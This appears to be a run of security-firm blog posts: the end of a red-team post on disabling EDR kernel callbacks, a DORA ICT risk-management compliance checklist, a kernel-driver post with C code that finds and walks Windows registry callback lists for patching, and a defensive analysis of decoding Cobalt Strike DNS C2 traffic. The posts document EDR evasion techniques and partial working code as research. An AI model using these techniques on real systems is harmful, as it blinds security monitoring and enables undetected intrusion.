With the ability to now patch all the kernel callbacks, I decided to try and bypass $vendor2 once more. I disabled its botnet protection module, which inspects network traffic for potential malicious activity, since this is what flagged the meterpreter traffic in the first place. I wanted to see if apart from network packet inspection, $vendor2 would detect the meterpreter payload. However, after testing with an HTTPS implant, the botnet protection did not detect and block the payload.

4. Conclusion

This blogpost concludes patching the kernel callbacks. While there is more functionality to add and more problems to address from kernel space, such as ETW or minifilters, the main goal of sufficiently crippling an EDR/AV product using a kernel driver has been met. Using Interceptor, we can deploy a meterpreter shell or Cobalt Strike Beacon and even run Mimikatz undetected. The next challenge will be to deploy the driver on a target and bypass protections such as Driver Signature Enforcement.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

DORA and ICT Risk Management: how to self-assess your compliance

2 December 2021 at 10:09

TL;DR – In this blogpost, we will give you an introduction to the key requirements associated with the Risk Management Framework introduced by DORA (Digital Operational Resilience Act); 

More specifically, throughout this blogpost we will try to formulate an answer to following questions:

  • What are the key requirements associated with the Risk Management Framework of DORA?
  • What are the biggest challenges associated with these requirements?
  • How can you prepare yourself and what are the actions that you should took in aligning your organization to the Risk Management Framework requirements?

In the following sections, we will share our thoughts on how to self-assess your compliance on this requirement. Note also that, if this self-assessment checklist is of interest to you, you will be able to find it in an excel format in our GitHub repository, here.  

What are the ICT Risk Management requirements?

DORA requires organizations to apply a strong risk-based approach in their digital operational resilience efforts. This approach is reflected in Chapter 2 of the regulation.

Chapter 2 – Section 1 – Risk management governance

The first part of Chapter 2 addresses the risk management governance requirements. They include, but are not limited to, setting roles and responsibilities of the management body, planning and periodic auditing.

This section states the responsibilities of the management body for the definition, approval, overseeing of all arrangements related to the ICT risk management framework.

This section also states the definition and attribution of the role of ICT third party Officer. This position shall be in charge of defining and monitoring all the arrangements concluded with ICT third-party service providers on the use of ICT services.

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 4 Governance and organisation
Responsibilities of the management body The management body shall define, approve, oversee and be accountable for the implementation of all arrangements related to the ICT risk management framework.
ICT third party Officer The role of ICT third party Officer shall be defined to monitor the arrangements concluded with ICT third-party service providers on the use of ICT services 
Training of the management body The management body shall, on a regular basis, follow specific trainings related to ICT risks and their impact on the operations 

Chapter 2 – Section 2 – Risk management framework

The second part of Chapter 2 introduces the ICT risk management framework itself as a critical component of the regulation.

ICT risk management requirements form a set of key principles revolving around specific functions (identification, protection and prevention, detection, response and recovery, learning and evolving and communication). Most of them are recognized by current technical standards and industry best practices, such as the NIST framework, and thus the DORA does not impose specific standardization itself.

Before exploring the functions, let’s note that DORA specifies several governance mechanisms around the risk management framework. They include, but are not limited to, setting the objectives of the risk management framework, planning and periodic auditing.

The following table provides a checklist for financial entities to self-assess their compliance on these governance requirement:

Article 5 ICT risk management framework
Protecting physical elements Entities shall define a well-documented ICT risk management framework which shall include strategies, policies, procedures, ICT protocols and tools which are necessary to protect all relevant physical components and infrastructures
Information on ICT risks Entities shall minimise the impact of ICT risk by deploying appropriate strategies, policies, procedures, protocols and tools
ISMS Entities shall implement an information security management system based on recognized international standards
Three lines of defence  Entities shall ensure appropriate segregation of ICT management functions, control functions, and internal audit functions
Review The ICT risk management framework shall be reviewed at least once a year, as well as upon the occurrence of major ICT-related incidents
Improvement The ICT risk management framework shall be continuously improved on the basis of lessons derived from implementation and monitoring
Audit The ICT risk management framework shall be audited on a regular basis by ICT auditors 
Remediation Entities shall define a formal follow-up process for the timely verification and remediation of critical ICT audit findings
ICT risk management framework objectives The ICT risk management framework shall include the methods to address ICT risk and attain specific ICT objectives

Identification

Financial entities shall identify and classify the ICT-related business functions, information assets and supporting ICT resources based on which risks posed by current cyber threats and ICT vulnerabilities are identified and assessed.

The following table provides a checklist for financial entities to self-assess their compliance on the Identification requirement:

Article 7 Identification 
Asset Identification Entities shall identify and adequately document:
(a) ICT-related business functions
(b) Information assets supporting these functions
(c) ICT system configurations and interconnections with internal and external ICT systems
Asset Classification  Entities shall classify and adequately document:
(a) ICT-related business functions
(b) Information assets supporting these functions
(c) ICT system configurations and interconnections with internal and external ICT systems
Asset Classification Review  Entities shall review as needed, and at least yearly, the adequacy of the classification of the information assets 
ICT risks Identification and Assessment  Entities shall identify all sources of ICT risks, and assess cyber threats and ICT vulnerabilities relevant to their ICT-related business functions and information assets. 
ICT risks Identification and Assessment Review Entities shall regularly review the ICT risks Identification and Assessment yearly or upon each major change in the network and information system infrastructure
ICT mapping Entities shall identify all ICT systems accounts, the network resources and hardware equipment
(a) Entities shall map physical equipment considered critical
(b) Entities shall map the configuration of the ICT assets and the links and interdependencies between the different ICT assets. 
 ICT third-party service providers identification Entities shall identify all ICT third-party service providers
(a) Entities shall identify and document all processes that are dependent on ICT third-party service providers
(b) Entities shall identify interconnections with ICT third-party service providers.
 ICT third-party service providers identification review Entities shall regularly review the  ICT third-party service providers identification
Legacy ICT systems Entities shall on a regular basis, and at least yearly, conduct a specific ICT risk assessment on all legacy ICT systems

This ICT risk management framework shall include the identification of critical and important functions as well as the mapping of the ICT assets that underpin them. Moreover, this ICT risk management framework shall also include the assessment of all risks associated with the ICT-related business functions and information assets identified.

What to identify and assess? Well …

  • ICT-related business functions
  • Supporting information assets supporting these functions
  • ICT system configurations
  • Interconnections with internal and external systems
  • Sources of ICT risk
  • All ICT system accounts
  • Network resources and hardware equipment
  • Critical physical equipment
  • All processes dependent on and interconnections with ICT third-party service providers

Protection and Prevention

Financial entities shall (based on the risk assessment) set up protection and prevention measures to ensure the resilience, continuity and availability of ICT systems. These shall include ICT  security  strategies, policies,  procedures and appropriate technologies.

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 8 Protection and Prevention 
CIA Entities shall develop and document an information security policy defining rules to protect the confidentiality, integrity and availability of theirs, and their customers’ ICT resources, data and information assets; 
Segmentation Entities shall establish a sound network and infrastructure management using appropriate techniques, methods and protocols including implementing automated mechanisms to isolate affected information assets in case of cyber-attacks
Access privileges Entities shall implement policies that limit the physical and virtual access to ICT system resources and data and establish to that effect a set of policies, procedures and controls that address access privileges
Authentication mechanisms Entities shall implement policies and protocols for strong authentication mechanisms and dedicated controls systems to prevent access to cryptographic keys 
ICT change management  Entities shall implement policies, procedures and controls for ICT change management including changes to software, hardware, firmware components, system or security changes. The ICT change management process shall be approved by appropriate lines of management and shall have specific protocols enabled for emergency changes. 
Patching Entities shall have appropriate and comprehensive policies for patches and updates

What does this entail?

  • Ensuring the resilience, continuity and availability of ICT systems
  • Ensuring the security, confidentiality and integrity of data
  • Ensuring the continuous monitoring and control of ICT systems and tools
  • Defining and implementing Information security policies such as
    • Limit physical and virtual access to ICT systems
    • Protocols on strong authentication
    • Change management
    • Patching / updates management

Detection

Financial entities shall continuously monitor and promptly detect anomalous activities, threats and compromises of the ICT environment.

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 9 Detection 
Detect anomalous activities Entities shall have in place mechanisms to promptly detect anomalous activities
(a) ICT network performance issues
(b) ICT-related incidents
Detect single points of failure Entities shall have in place mechanisms to identify all potential material single points of failure
Testing All detection mechanisms shall be regularly tested 
Alert mechanism All detection mechanisms shall enable multiple layers of control
(a) Define alert thresholds
(b) Define criteria to trigger ICT-related incident detection
(c) Define criteria to trigger ICT-related incident response processes
(d) Have automatic alert mechanisms in place for relevant staff in charge of ICT-related incident response. 
Trade reports checking Entities shall have in place systems that can effectively check trade reports for completeness, identify omissions and obvious errors and request re-transmission of any such erroneous reports. 

What does this entail?

  • Ensure the prompt detection of anomalous activities
  • Enforce multiple layers of control
  • Enable the identification of single points of failure

Response and recovery (including Backup policies and recovery methods)

Financial entities shall put in place dedicated and comprehensive business continuity policies and disaster and recovery plans to adequately react to identified security incidents and to ensure the resilience, continuity and availability of ICT systems.

The following table provides a checklist for financial entities to self-assess their compliance on Response and recovery requirements:

Article 10 Response and recovery 
ICT Business Continuity Policy  Entities shall put in place a dedicated and comprehensive ICT Business Continuity Policy as an integral part of the operational business continuity policy  of the entity
ICT Business Continuity Mechanisms Entities shall implement the ICT Business Continuity Policy through appropriate and documented arrangements, plans, procedures and mechanisms aimed at:
(a) recording all ICT-related incidents ;
(b) ensuring the continuity of the entity’s critical functions;
(c) quickly, appropriately and effectively responding to and resolving all ICT-related incidents
(d) activating without delay dedicated plans that enable containment measures, processes and technologies, as well as tailored response and recovery procedures 
(e) estimating preliminary impacts, damages and losses;
(f) setting out communication and crisis management actions which ensure that updated information is transmitted to all relevant internal staff and external stakeholders, and reported to competent authorities 
ICT Disaster Recovery Plan Entities shall implement an associated ICT Disaster Recovery Plan
ICT Disaster Recovery Audit Review Entities shall define a process for the ICT Disaster Recovery Plan to be subject to independent audit reviews.  
ICT Business Continuity Test  Entities shall periodically test the ICT Business Continuity Policy, at least yearly and after substantive changes to the ICT systems;
ICT Disaster Recovery Test Entities shall periodically test the ICT Disaster Recovery Plan, at least yearly and after substantive changes to the ICT systems;
Testing Plans Entities shall include in the testing plans scenarios of cyber-attacks and switchovers between the primary ICT infrastructure and the redundant capacity, backups and redundant facilities 
Crisis Communication Plans Entities shall implement a crisis communication plan
Crisis Communication Plans Test Entities shall periodically test the crisis communication plans, at least yearly and after substantive changes to the ICT systems;
Crisis Management Function Entities shall have a crisis management function, which, in case of activation of their ICT Business Continuity Policy or ICT Disaster Recovery Plan, shall set out clear procedures to manage internal and external crisis communications 
Records of Activities Entities shall keep records of activities before and during disruption events when their ICT Business Continuity Policy or ICT Disaster Recovery Plan is activated. 
ICT Business Continuity Policy Communication When implementing changes to the ICT Business Continuity Policy, entities shall communicate those changes to the competent authorities
Test Communication Entities shall define a process to provide to the competent authorities copies of the results of the ICT business continuity tests
Incident Communication Entities shall define a process to report to competent authorities all costs and losses caused by ICT disruptions and ICT-related incidents

The following table provides a checklist for financial entities to self-assess their compliance on Backup policies requirements:

Article 11 Backup policies and recovery methods 
Backup Policy Entities shall develop a backup policy
(a) specifying the scope of the data that is subject to the backup
(b) specifying the minimum frequency of the backup
(c) based on the criticality of information or the sensitiveness of the data
Backup Restoration When restoring backup data using own systems, entities shall use ICT systems that have an operating environment different from the main one, that is not directly connected with the latter and that is securely protected from any unauthorized access or ICT corruption
Recovery Plans Entities shall develop a recovery plans which enable the recovery of all transactions at the time of disruption to allow the central counterparty to continue to operate with certainty and to complete settlement on the scheduled date
Recovery Methods Entities shall develop recovery methods to limit downtime and limited disruption
ICT third-party providers Continuity Entities shall ensure that their ICT third-party providers maintain at least one secondary processing site endowed with resources, capabilities, functionalities and staffing arrangements sufficient and appropriate to ensure business needs
ICT third-party providers secondary processing site Entities shall ensure that the ICT third-party provider secondary processing site is:
(a) located at a geographical distance from the primary processing site
(b) capable of ensuring the continuity of critical services identically to the primary site
(c) immediately accessible to the entity’s staff to ensure continuity of critical services 
Recovery time objectives Entities shall determine recovery time and point objectives for each function. Such time objectives shall ensure that, in extreme scenarios, the agreed service levels are met
Recovery checks When recovering from an ICT-related incident, entities shall perform multiple checks, including reconciliations, in order to ensure that the level of data integrity is of the highest level

How to meet the compliance on the Response and Recovery requirements?

  • Define and implement an ICT Business Continuity Policy
  • Define and implement an ICT Disaster Recovery Plans
  • Define and implement an Back-up policies
  • Develop recovery methods
  • Determine flexible recovery time and point objectives for each function

Developing response and recovery strategies and plans adds an additional level of complexity, as it will require financial entities to think carefully about substitutability, including investing in backup and restoration systems, as well as assess whether – and how – certain critical functions can operate through alternative systems or methods of delivery while primary systems are checked and brought back up.

Learning and evolving

Financial entities shall include continuous learning and evolving in the internal processes in the form of information-gathering, as well as post-incident review and analysis.

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 12 Learning and evolving 
Risk landscape Entities shall gather information on vulnerabilities and cyber threats, ICT-related incidents, in particular cyber-attacks, and analyse their likely impacts on their digital operational resilience.
Post ICT-related incident reviews  Entities shall put in place post ICT-related incident reviews after significant ICT disruptions of their core activities
(a) analysing the causes of disruption
(b) identifying required improvements to the ICT operations or within the ICT Business Continuity Policy  
Post ICT-related incident reviews mechanism Entities shall ensure the post ICT-related incident reviews determines whether the established procedures were followed and the actions taken were effective
(a) the promptness in responding to security alerts and determining the impact of ICT-related incidents and their severity;
(b) the quality and speed in performing forensic analysis;
(c) the effectiveness of incident escalation within the financial entity;
(d) the effectiveness of internal and external communication 
Lessons learned from the ICT Business Continuity and ICT Disaster Recovery tests Entities shall derive lessons from the ICT Business Continuity and ICT Disaster Recovery tests. Lessons shall be duly incorporated on a continuous basis into the ICT risk assessment process
Lessons learned reporting Senior ICT staff shall report at least yearly to the management body on the findings derived from the lessons learned from the ICT Business Continuity and ICT Disaster Recovery tests
Monitor the effectiveness of the implementation of the digital resilience strategy Entities shall map the evolution of ICT risks over time, analyse the frequency, types, magnitude and evolution of ICT-related incidents, in particular cyber-attacks and their patterns, with a view to understand the level of ICT risk exposure and enhance the cyber maturity and preparedness of the entity
ICT security awareness programs  Entities shall develop ICT security awareness trainings as compulsory modules in their staff training schemes
Digital operational resilience training Entities shall develop ICT digital operational resilience trainings as compulsory modules in their staff training schemes 

What does this entail?

  • Ensure information gathering on vulnerabilities and cyber threats
  • Ensure post-incident reviews after significant ICT disruptions
  • Define a procedure for the analysis of causes of disruptions
  • Define a procedure for the reporting to the management body
  • Develop ICT security awareness programs and trainings

Developing an ICT security awareness programs and trainings adds another level of complexity, as DORA does not only introduces compulsory training on digital operational resilience for the management body, DORA also introduces it for the whole staff, as part of their general training package. 

Communication

Financial entities shall define a communication strategy, plans and procedures for communicating ICT-related incidents to clients, counterparts and the public

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 13 Communication 
Clients and counterparts communication Entities shall have in place communication plans enabling a responsible disclosure of ICT-related incidents or major vulnerabilities to clients and counterparts as well as to the public, as appropriate. 
Staff communication Entities shall implement communication policies for staff and for external stakeholders.
(a) Communication policies for staff shall take into account the need to differentiate between staff involved in the ICT risk management, in particular response and recovery, and staff that needs to be informed. 
Mandate At least one person in the entity shall be tasked with implementing the communication strategy for ICT-related incidents and fulfil the role of public and media spokesperson for that purpose. 

What does this entail?

  • Develop communication plans to communicate to clients, counterparts and the public
  • Mandate at least one person to implement the communication strategy for ICT-related incidents

I hope you found this blogpost interesting.

Keep an eye out for the following parts! This blog post is part of a series. In the following blogposts, we will further explore the requirements associated with the Incident Management process, the Digital Operational Resilience Testing and the ICT Third-Party Risk Management of DORA.

About the Author

Nicolas is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into his technical hands-on experiences as well as his managerial academic background to help organisations build out their Cyber Security Strategy. He has a strong interest IT management, Digital Transformation, Information Security and Data Protection. In his personal life, he likes adventurous vacations. He hiked several 4000+ summits around the world, and secretly dreams about one day hiking all of the top summits. In his free time, he is an academic teacher who has been teaching for 7 years at both the Solvay Brussels School of Economics and Management and the Brussels School of Engineering. 

Find out more about Nicolas on Linkedin.

Kernel Karnage – Part 5 (I/O & Callbacks)

30 November 2021 at 10:02

After showing interceptor’s options, it’s time to continue coding! On the menu are registry callbacks, doubly linked lists and a struggle with I/O in native C.

1. Interceptor 2.0

Until now, I relied on the Evil driver to patch kernel callbacks while I attempted to tackle $vendor2, however the Evil driver only implements patching for process and thread callbacks. This week I spent a good amount of time porting over the functionality from Evil driver to Interceptor and added support for patching image load callbacks as well as a first effort at enumerating registry callbacks.

While I was working, I stumbled upon Mimidrv In Depth: Exploring Mimikatz’s Kernel Driver by Matt Hand, an excellent blogpost which aims to clarify the inner workings of Mimikatz’ kernel driver. Looking at the Mimikatz kernel driver code made me realize I’m a terrible C/C++ developer and I wish drivers were written in C# instead, but it also gave me an insight into handling different aspects of the interaction process between the kernel driver and the user mode application.

To make up for my sins, I refactored a lot of my code to use a more modular approach and keep the actual driver code clean and limited to driver-specific functionality. For those interested, the architecture of Interceptor looks somewhat like this:

.
+-- Driver
|   +-- Header Files
    |   +-- Common.h                | contains structs and IOCTLs shared between the driver and CLI
    |   +-- Globals.h               | contains global variables used in all modules
    |   +-- pch.h                   | precompiled header
    |   +-- Interceptor.h           | function prototypes
    |   +-- Intercept.h             | function prototypes
    |   +-- Callbacks.h             | function prototypes
    +-- Source Files
    |   +-- pch.cpp
    |   +-- Interceptor.cpp         | driver code
    |   +-- Intercept.cpp           | IRP hooking module
    |   +-- Callbacks.cpp           | Callback patching module
+-- CLI
|   +-- Source Files
    |   +-- InterceptorCLI.cpp

2. Driver I/O and why it’s a mess

Something else that needs overhauling is the way the driver handles I/O from the user mode application. When the user mode application requests a listing of all the present drivers on the system, or the registered callbacks, a lot of data needs to be collected and sent back in an efficient and structured manner. I’m not particularly fussy about speed or memory usage, but I would like to keep the code tidy, easy to read and understand, and keep the risk of dangling pointers and memory leaks at a minimum.

Drivers typically handle I/O via 3 different ways:

  1. Using the IRP_MJ_READ dispatch routine with ReadFile()
  2. Using the IRP_MJ_WRITE dispatch routine with WriteFile()
  3. Using the IRP_MJ_DEVICE_CONTROL dispatch routine with DeviceIoControl()

Using 3 different methods:

  1. Buffered I/O
  2. Direct I/O
  3. On a IOCTL basis
    1. METHOD_NEITHER
    2. METHOD_BUFFERED
    3. METHOD_IN_DIRECT
    4. METHOD_OUT_DIRECT

Since Interceptor returns different data depending on the request (IRP) it received, the I/O is handled in the IRP_MJ_DEVICE_CONTROL dispatch routine on a IOCTL basis using METHOD_BUFFERED. As discussed in Part 2, an IRP is accompanied by one or more IO_STACK_LOCATION structures which we can retrieve using IoGetCurrentIrpStackLocation(). The current stack location is important, because it contains several fields with information regarding user buffers.

When using METHOD_BUFFERED, the I/O Manager will assist us with managing resources. When the request comes in, the I/O manager will allocate the system buffer from non-paged pool memory (non-paged pool memory is always present in RAM) with a size that is the maximum of the lengths of the input and output buffers and then copy the user input buffer to the system buffer. When the request is complete, the I/O manager copies the specified number of bytes from the system buffer to the user output buffer.

PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
//size of user input buffer
size_t szBufferIn = stack->Parameters.DeviceIoControl.InputBufferLength;
//size of user output buffer
size_t szBufferOut = stack->Parameters.DeviceIoControl.OutputBufferLength;
//system buffer used for both reading and writing
PVOID bufferInOut = Irp->AssociatedIrp.SystemBuffer;

Using buffered I/O has a drawback, namely we need to define common I/O structures for use in both driver and user mode application, so we know what input, output and size to expect. As an example, we will pass an index and driver name from our user mode application to our driver:

//Common.h
struct USER_DRIVER_DATA {
    char driverName[256];
    int index;
}

//ApplicationCLI.cpp
DWORD lpBytesReturned;
USER_DRIVER_DATA inputBuffer;
data.index = 1;
data.driverName = "\\Driver\\MyDriver";
DeviceIoControl(hDevice, IOCTL_MYDRIVER_GET_DRIVER_INFO, &inputBuffer, sizeof(inputBuffer), nullptr, 0, &lpBytesReturned, nullptr);

//MyDriver.cpp
auto data = (USER_DRIVER_DATA*)Irp->AssociatedIrp.SystemBuffer;
int index = data->index;
char driverName[256];
strcpy_s(driverName, data->driverName);

Using this approach, we quickly end up with a lot of different structures in Common.h for each of the different I/O requests, so I went looking for a “better”, more generic way of handling I/O. I decided to look at the Mimikatz kernel driver code again for inspiration. The Mimikatz driver uses METHOD_NEITHER, combined with a custom buffer and a wrapper around the RtlStringCbPrintfExW() function.

When using METHOD_NEITHER, the I/O Manager is not involved and it is up to the driver itself to manage the user buffers. The input and output buffer are no longer copied to and from the system buffer.

PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
//using input buffer
PVOID bufferIn = stack->Parameters.DeviceIoControl.Type3InputBuffer;
//user output buffer
PVOID bufferOut = Irp->UserBuffer;

The idea behind the Mimikatz approach is to declare a single buffer structure and a wrapper kprintf() around RtlStringCbPrintfExW():

typedef struct _MY_BUFFER {
    size_t* szBuffer;
    PWSTR* Buffer;
} MY_BUFFER, * PMY_BUFFER;

#define kprintf(MyBuffer, Format, ...) (RtlStringCbPrintfExW(*(MyBuffer)->Buffer, *(MyBuffer)->szBuffer, (MyBuffer)->Buffer, (MyBuffer)->szBuffer, STRSAFE_NO_TRUNCATION, Format, __VA_ARGS__))

The kprintf() wrapper accepts a pointer to our buffer structure MY_BUFFER, a format string and multiple arguments to be used with the format string. Using the provided format string, it will write a byte-counted, null-terminated text string to the supplied buffer *(MyBuffer)->Buffer.

Using this approach, we can dynamically allocate our user output buffer using bufferOut = LocalAlloc(LPTR, szBufferOut), this will allocate the specified number of bytes (szBufferOut) as fixed memory memory on the heap and initialize it to zero (LPTR (0x0040) flag = LMEM_FIXED (0x0000) + LMEM_ZEROINIT (0x0040) flags).

We can then write to this output buffer in our driver using the kprintf() wrapper:

MY_BUFFER kOutputBuffer = { &szBufferOut, (PWSTR*)&bufferOut };
szBufferOut = stack->Parameters.DeviceIoControl.OutputBufferLength;
bufferOut = Irp->UserBuffer;
szBufferIn = stack->Parameters.DeviceIoControl.InputBufferLength;
bufferIn = stack->Parameters.DeviceIoControl.Type3InputBuffer;

kprintf(&kOutputBuffer, L"Input: %s\nOutput: %s\n", bufferIn, L"our output");
ULONG_PTR information = stack->Parameters.DeviceIoControl.OutputBufferLength - szBufferOut;

return CompleteIrp(Irp, status, information);

If the output buffer appears too small for all the data we wish to write, kprintf() will return STATUS_BUFFER_OVERFLOW. Because the STRSAFE_NO_TRUNCATION flag is set in RtlStringCbPrintfExW(), the contents of the output buffer will not be modified, so we can increase the size, reallocate the output buffer on the heap and try again.

3. Recalling the callbacks

As mentioned in previous blogposts, locating the different callback arrays and implementing a function to patch them was fairly straightforward. Apart from process and thread callbacks, I also added in the PsLoadImageNotifyRoutineEx() callback, which alerts a driver whenever a new image is loaded or mapped into memory.

Registry and Object creation/duplication callbacks work slightly different when it comes to how the callback function addresses are stored. Instead of a callback array containing function pointers, the function pointers for registry and object callbacks are stored in a doubly linked list. This means that instead of looking for a callback array address, we’ll be looking for the address of the CallbackListHead.

CallbackListHead

Instead of going the same route as with obtaining the address for the callback arrays by enumerating the instructions in the NotifyRoutine() functions looking for a series of opcodes, I decided to instead enumerate the CmUnRegisterCallback() function, which is used to remove a registry callback. The reason behind this approach is that in order to obtain the CallbackListHead address via CmRegisterCallback(), we need to follow 2 jumps (0xE8) to CmpRegisterCallbackInternal() and CmpInsertCallbackInListByAltitude(). Instead, by using CmUnRegisterCallback(), we only need to look for a LEA, RCX (0x48 0x8d 0x0d) instruction which puts the address of the CallbackListHead into RCX.

ULONG64 FindCmUnregisterCallbackCallbackListHead() {
	UNICODE_STRING func;
	RtlInitUnicodeString(&func, L"CmUnRegisterCallback");

	ULONG64 funcAddr = (ULONG64)MmGetSystemRoutineAddress(&func);

	ULONG64 OffsetAddr = 0;
	for (ULONG64 instructionAddr = funcAddr; instructionAddr < funcAddr + 0xff; instructionAddr++) {
		if (*(PUCHAR)instructionAddr == OPCODE_LEA_RCX_7[g_WindowsIndex] &&
			*(PUCHAR)(instructionAddr + 1) == OPCODE_LEA_RCX_8[g_WindowsIndex] &&
			*(PUCHAR)(instructionAddr + 2) == OPCODE_LEA_RCX_9[g_WindowsIndex]) {

			OffsetAddr = 0;
			memcpy(&OffsetAddr, (PUCHAR)(instructionAddr + 3), 4);
			return OffsetAddr + 7 + instructionAddr;
		}
	}
	return 0;
}

Once we have the CallbackListHead address, we can use it to enumerate the doubly linked list and retrieve the callback function pointers. The structure we’re working with can be defined as:

typedef struct _CMREG_CALLBACK {
    LIST_ENTRY List;
    ULONG Unknown1;
    ULONG Unknown2;
    LARGE_INTEGER Cookie;
    PVOID Unknown3;
    PEX_CALLBACK_FUNCTION Function;
} CMREG_CALLBACK, *PCMREG_CALLBACK;

The registered callback function pointer is located at offset 0x28.

PVOID* CallbackListHead = (PVOID*)FindCmUnregisterCallbackCallbackListHead();
PLIST_ENTRY pEntry;
ULONG64 i;

if (CallbackListHead) {
    for (pEntry = (PLIST_ENTRY)*CallbackListHead, i = 0; NT_SUCCESS(status) && (pEntry != (PLIST_ENTRY)CallbackListHead); pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
        ULONG64 callbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x028);
        KdPrint((DRIVER_PREFIX "[%02llu] 0x%llx\n", i, callbackFuncAddr));
        //<truncated>   
    }
}

4. Conclusion

In this blogpost we took a brief look at the structure of the Interceptor kernel driver and how we can handle I/O between the kernel driver and user mode application without the need to create a crazy amount of structures. We then ventured back into callback land and took a peek at obtaining the CallbackListHead address of the doubly linked list containing registered registry callback function pointers (try saying that quickly 5 times in a row 😉 ).

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Cobalt Strike: Decrypting DNS Traffic – Part 5

29 November 2021 at 11:14

Cobalt Strike beacons can communicate over DNS. We show how to decode and decrypt DNS traffic in this blog post.

This series of blog posts describes different methods to decrypt Cobalt Strike traffic. In part 1 of this series, we revealed private encryption keys found in rogue Cobalt Strike packages. In part 2, we decrypted Cobalt Strike traffic starting with a private RSA key. In part 3, we explain how to decrypt Cobalt Strike traffic if you don’t know the private RSA key but do have a process memory dump. And in part 4, we deal with traffic obfuscated with malleable C2 data transforms.

In the first 4 parts of this series, we have always looked at traffic over HTTP (or HTTPS). A beacon can also be configured to communicate over DNS, by performing DNS requests for A, AAAA and/or TXT records. Data flowing from the beacon to the team server is encoded with hexadecimal digits that make up labels of the queried name, and data flowing from the team server to the beacon is contained in the answers of A, AAAA and/or TXT records.

The data needs to be extracted from DNS queries, and then it can be decrypted (with the same cryptographic methods as for traffic over HTTP).

DNS C2 protocol

We use a challenge from the 2021 edition of the Cyber Security Rumble to illustrate how Cobalt Strike DNS traffic looks like.

First we need to take a look at the beacon configuration with tool 1768.py:

Figure 1: configuration of a DNS beacon

Field “payload type” confirms that this is a DNS beacon, and the field “server” tells us what domain is used for the DNS queries: wallet[.]thedarkestside[.]org.

And then a third block of DNS configuration parameters is highlighted in figure 1: maxdns, DNS_idle, … We will explain them when they appear in the DNS traffic we are going to analyze.

Seen in Wireshark, that DNS traffic looks like this:

Figure 2: Wireshark view of Cobalt Strike DNS traffic

We condensed this information (field Info) into this textual representation of DNS queries and replies:

Figure 3: Textual representation of Cobalt Strike DNS traffic

Let’s start with the first set of queries:

Figure 4: DNS_beacon queries and replies

At regular intervals (determined by the sleep settings), the beacon issues an A record DNS query for name 19997cf2[.]wallet[.]thedarkestside[.]org. wallet[.]thedarkestside[.]org are the root labels of every query that this beacon will issue, and this is set inside the config. 19997cf2 is the hexadecimal representation of the beacon ID (bid) of this particular beacon instance. Each running beacon generates a 32-bit number, that is used to identify the beacon with the team server. It is different for each running beacon, even when the same beacon executable is started several times. All DNS request for this particular beacon, will have root labels 19997cf2[.]wallet[.]thedarkestside[.]org.

To determine the purpose of a set of DNS queries like above, we need to consult the configuration of the beacon:

Figure 5: zooming in on the DNS settings of the configuration of this beacon (Figure 1)

The following settings define the top label per type of query:

  1. DNS_beacon
  2. DNS_A
  3. DNS_AAAA
  4. DNS_TXT
  5. DNS_metadata
  6. DNS_output

Notice that the values seen in figure 5 for these settings, are the default Cobalt Strike profile settings.

For example, if DNS queries issued by this beacon have a name starting with http://www., then we know that these are queries to send the metadata to the team server.

In the configuration of our beacon, the value of DNS_beacon is (NULL …): that’s an empty string, and it means that no label is put in front of the root labels. Thus, with this, we know that queries with name 19997cf2[.]wallet[.]thedarkestside[.]org are DNS_beacon queries. DNS_beacon queries is what a beacon uses to inquire if the team server has tasks for the beacon in its queue. The reply to this A record DNS query is an IPv4 address, and that address instructs the beacon what to do. To understand what the instruction is, we first need to XOR this replied address with the value of setting DNS_Idle. In our beacon, that DNS_Idle value is 8.8.4.4 (the default DNS_Idle value is 0.0.0.0).

Looking at figure 4, we see that the replies to the first requests are 8.8.4.4. These have to be XORed with DNS_Idle value 8.8.4.4: thus the result is 0.0.0.0. A reply equal to 0.0.0.0 means that there are no tasks inside the team server queue for this beacon, and that it should sleep and check again later. So for the first 5 queries in figure 4, the beacon has to do nothing.

That changes with the 6th query: the reply is IPv4 address 8.8.4.246, and when we XOR that value with 8.8.4.4, we end up with 0.0.0.242. Value 0.0.0.242 instructs the beacon to check for tasks using TXT record queries.

Here are the possible values that determine how a beacon should interact with the team server:

Figure 6: possible DNS_Beacon replies

If the least significant bit is set, the beacon should do a checkin (with a DNS_metadata query).

If bits 4 to 2 are cleared, communication should be done with A records.

If bit 2 is set, communication should be done with TXT records.

And if bit 3 is set, communication should be done with AAAA records.

Value 242 is 11110010, thus no checkin has to be performed but tasks should be retrieved via TXT records.

The next set of DNS queries are performed by the beacon because of the instructions (0.0.0.242) it received:

Figure 7: DNS_TXT queries

Notice that the names in these queries start with api., thus they are DNS_TXT queries, according to the configuration (see figure 5). And that is per the instruction of the team server (0.0.0.242).

Although DNS_TXT queries should use TXT records, the very first DNS query of a DNS_TXT query is an A record query. The reply, an IPv4 address, has to be XORed with the DNS_Idle value. So here in our example, 8.8.4.68 XORed with 8.8.4.4 gives 0.0.0.64. This specifies the length (64 bytes) of the encrypted data that will be transmitted over TXT records. Notice that for DNS_A and DNS_AAAA queries, the first query will be an A record query too. It also encodes the length of the encrypted data to be received.

Next the beacon issues as many TXT record queries as necessary. The value of each TXT record is a BASE64 string, that has to be concatenated together before decoding. The beacon stops issuing TXT record requests once the decoded data has reached the length specified in the A record reply (64 bytes in our example).

